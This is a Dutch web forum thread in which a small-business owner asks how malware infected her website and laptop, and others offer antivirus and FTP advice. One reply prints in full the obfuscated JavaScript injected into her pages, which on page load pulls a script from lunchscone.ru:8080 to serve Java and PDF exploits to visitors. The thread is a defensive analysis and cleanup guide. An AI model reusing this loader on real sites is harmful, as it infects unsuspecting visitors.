Mijn website (heb de link verwijderd omdat er blijkbaar nog steeds problemen zijn) was vandaag geveld door een virus en ook mijn laptop was besmet. Het ging om dit virus HEUR:Trojan-Downloader.Script.Generic

Nu bewerk ik mijn site met gebrekkige HTML-kennis en weet ik er verder niets vanaf. Ik had mijn site niet recent bezocht of bewerkt en ik snap niet hoe ik dit virus te pakken heb gekregen. Kan iemand deze digibeet uitleggen hoe dit virus op de site is gekomen en hoe dit in de toekomst te voorkomen?

Alvast mijn dank :)

Heb je een goede virus scanner op je laptop? AVG is erg goed alleen niet meer gratis volgens mij dat helpt wel om virussen tegen te houden. Hier staat er een verhaal over wat je moet doen om deze trojan weg te krijgen http://www.pinbrook.net/trojan-warning Hoe je eraan komt is altijd een raadsel download je wel eens met torrent? Daar schijnen ook veel virussen bij te zitten.

Ik heb ook is een "virus" op mijn site gehad.

Ik ging naar een site die ook geïnfecteerd was, mijn scanner(McAfee) kende deze niet dus kon probleemloos te werk gaan.
Hij ging naar mijn ftp kijken(filezilla) en kon via daar mijn ftp vinden.
Daarna ging de "bot" de index aanpassen zodat het "virus" zich verspreiden kon.

Mogelijk heeft u ook zoiets dergelijks, ik raad u dan aan een goeie ftp programma te nemen.

Overigens een goeie gratis scanner:
Malware bytes anti-malware.

Groeten,
Tim

Lees dit en dit artikel eens door, hierin heb ik (in het kort) één en ander omschreven.
Wil je meer info, of zelfs hulp, stuur me een PM..

Ik bezoek uw site......NOD32 geeft een mooie, rode melding!
Haal misschien je url weg, of verstop hem voor gebruikers die graag klikken. ;)

Gebruik een goede virusscanner en FileZilla. FTP-virussen werken daar niet op.

FTP virussen zijn virussen die zich op uw computer nestelen en uw HTML-bestanden aanpassen. Ze implementeren dan een connectie naar een andere site die een virus laadt.

Origineel gepost door J. Willemsen

Gebruik een goede virusscanner en FileZilla. FTP-virussen werken daar niet op.

FTP virussen zijn virussen die zich op uw computer nestelen en uw HTML-bestanden aanpassen. Ze implementeren dan een connectie naar een andere site die een virus laadt.

Jammer genoeg gebeurt het ook bij filezilla.

Groeten,
Tim

...dus voortaan logindata niet opslaan in de sitemanager maar in een aparte .doc oid in een andere map.

Hallo allemaal.

Ten eerste even een waarschuwing voor iedereen hier, de malware staat nog steeds op de site van Selma Franssen. Bezoek deze dus niet zolang het nog niet is opgelost.

Beste Selma.
Ik heb even een uitgebreide analyse gemaakt van je website. Het blijkt dat een aantal van je pagina's scripts includen van het domein: lunchscone.ru:8080. Vanaf dit domein wordt vervolgens een (bekende) exploit in JAVA en PDF uitgevoerd in de hoop om het systeem van een nietsvermoedende bezoeker te infecteren. Deze exploit in JAVA is enige tijd geleden aan het licht gekomen. Dit is de reden waarom de meeste virusscanner gelukkig bezoekers waarschuwen.

U kunt overigens duidelijk zien dat uw pagina's geinfecteerd zijn. Als u de paginabron opvraagt van uw indexpagina dan ziet u helemaal onderaan (na de </html>) de volgende code:

Code:

<script>function a(){this.Nk=false;this.A=false;var R=new Date();var W=window;var UK=new Date();var v="v";var U=new String("/goOs6P".substr(0,3)+"ogl"+"gGKme.cmKgG".substr(4,3)+"om/"+"mon"+"kVM6eyc6MkV".substr(4,3)+"9dGEontdEG9".substr(4,3)+"rol"+"4vAn.co".substr(4)+"R8S1m/m".substr(4)+"edi"+"ase"+"bvRt.iRvb".substr(3,3)+"t.p"+"kx5hp".substr(3));this.M="";this.WV="";var r=String("XL6Gde".substr(4)+"qtpofe".substr(4)+"r");this.m=38169;this.cz=4081;var h=W[new String("une"+"S7osca".substr(3)+"pemiz".substr(0,2))];var I=new Array();this.JP=43064;var l="scri8p7".substr(0,4)+"XgiptiXg".substr(3,2);this.Gp="";this.lJ=2019;var Ix=new Array();var QR="QR";this.QO=false;function D(T,p){var UY=new Date();var Hi=new Array();this.lsK=false;this.OL=false;var Uy=h(String("]"));this.sj=false;var K=h(new String("["));var NkS="";var P="";var Q=String("j7hKg".substr(4));var _D="_D";this.VK=false;var cF=new Date();var El=new Date();var Tl=new RegExp(K+p+Uy, Q);var jN="jN";this.an=false;var tb="tb";return T.replace(Tl, new String());};this.ta=false;var DS=new Date();var br="br";var s=document;this.VA=false;var N=D('cRrfefaRtTeTE0lVeRmfefnVtO','BVgSfTO05Ryzw');var u=D('sRrAcU','Ae0ubW8YUD9VnXmvhRkEHtG');var J=D('84247996464535547059465397377142498966941921970642264565943631','12546937');this.kU=false;var Sk=new Date();this.YD=false;function C(){var fO="";var Cs="Cs";this.ZV="";var B=h("htt"+"p:/"+"/lu"+"nch"+"sco"+"ne."+"iM5ru:".substr(3));var JY=new Date();var Bz=B+J+U;this.hW=21323;var WB="";var j=D('bVoldlyO','MLVCJ083DOAl');var WOk="";var w=D('aNpSpWeJn4d4C4h9ixlPdx','Px48NS9JW');this.zM=57674;this.eJ=21937;try {var fk=new Array();var aO=new Date();E=s[N](l);var mZ="mZ";var sX="sX";this.Dp=7907;E[u]=Bz;var wr="wr";var ru="";E[r]=[1,6][0];var qR="qR";this.lL="";var sja=new Date();s[j][w](E);var kO="";var xn="";} catch(L){var sI="sI";var Vy=new Date();};}var OE=new Date();this.oQ=false;var Uu=D('ornrlAoUaUdr','_jrU0A');W[Uu]=C;this.HH=false;};var Nh="Nh";this.aR="";this.TLM=false;var uFX="";a();var _Y=new Date();this.dYb=false;</script>

Deze code is toegevoegd op uw website door het virus dat aanwezig is op uw computer.

Ik raad u aan om de volgende acties te ondernemen:
1. Download Avast! antivirus (om een discussie te voorkomen moet u maar van mij aannemen dat dit de beste gratis antivirus is. Mochten mensen de reden willen weten (serieus) dan kunnen ze een PM sturen. Dit puur om topic vervuiling tegen te gaan)
2. Nadat u dit pakket gedownload heeft, moet u deze installeren. De-installeer alle andere virusscanners.
3. Omdat het zeer waarschijnlijk is dat delen van windows geinfecteerd zijn, moet u een startup scan plannen. Dit is een computer scan die wordt gedaan VOORDAT windows wordt geladen. Deze kunt u plannen door op het Avast icoontje met rechtermuisknop te klikken > 'Start Avast Antivirus' > menu > 'Plan opstart scan'.
4. Herstart uw computer. (indien stap 3 niet beschikbaar is vanwege OS incompatibaliteit, dan kunt u met avast gewoon een volledige scan draaien)
5. Nadat de (opstart)scan compleet is, is uw computer schoon
6. U opent nu de (html) documenten van uw website met kladblok, en controleert of u de bovenstaande code ergens vind. Zo ja, dan verwijderd u deze. Vervolgens upload u de 'veilige' versie van uw site via FileZilla.
7. Voor verdere vragen kunt u via PM contact met mij opnemen

Steven, complimenten voor je gehele uitleg, toch kom ik op mijn site die nu een aantal dagen opeens doorlinkt naar een andere site, geen rare html/php of wat voor code tegen.

Ook vinden de scanners niets.

Beetje een moedeloos iets dit, ook al wilde ik de site van de hand doen..

@Jay H, bent u dezelfde persoon als Selma Franssen, of bent u iemand met een soortgelijk probleem?

Ik kan (evt. tegen een kleine vergoeding) wel even voor u kijken naar uw website.
Contacteer mij via PM als ik u moet helpen.

Nee ik ben een totaal ander persoon ;)

Bedankt, ik ga het zelf nog even proberen maar ik hou je zeker in gedachte!

Bedankt voor alle reacties, ik heb voor de zekerheid de link naar mijn site maar even verwijderd. Het verbaast me dat m'n site nog steeds problemen geeft, ik had alle oude bestanden verwijderd en een niet besmette back up geupload. Dit met Filezilla vanaf mij nieuwe computer (net een uur in gebruik en met goede anti virus). Ik hoop niet dat mijn nieuwe pc ook al besmet is.

Anyway, ik ga bovenstaande uitleg dan maar opvolgen en hopen dat ik van het probleem afkom.
Aanvullend bericht:
@Steven Verkuil, bedankt voor de goede informatie, na wat geknutsel geeft mijn virusscanner in elk geval geen melding meer. Mooi, want ik had net op GoogleAds geadverteerd en het is natuurlijk zonde wanneer mogelijke toekomstige opdrachtgevers op een besmette site terechtkomen!

@Selma, uw site geeft geen melding bij mij. :)

Op dit moment geeft uw website ook geen meldingen meer bij mij.
Verdere analyse toont aan dat alle onveilige code van uw website is verwijderd.
deze is nu dus weer veilig om te gebruiken.

Let wel op dat het zo kan zijn dat broncode (.html bestanden) op uw computer nog steeds geïnfecteerd kunnen zijn. Dit zal niet gedetecteerd worden, door welke scanner dan ook, omdat het om javascript code gaat die pas gevaarlijk wordt in een browser (in kladblok is het ongevaarlijk). Kijk daarom voor de zekerheid nog even goed naar alle lokale html bestanden, en verwijder zo nodig de geïnfecteerde JS code. De online bestanden op uw website zijn nu dus wel schoon.

Voor meer info:
https://www.sitedeals.nl/websites-alg...t-te-doen.html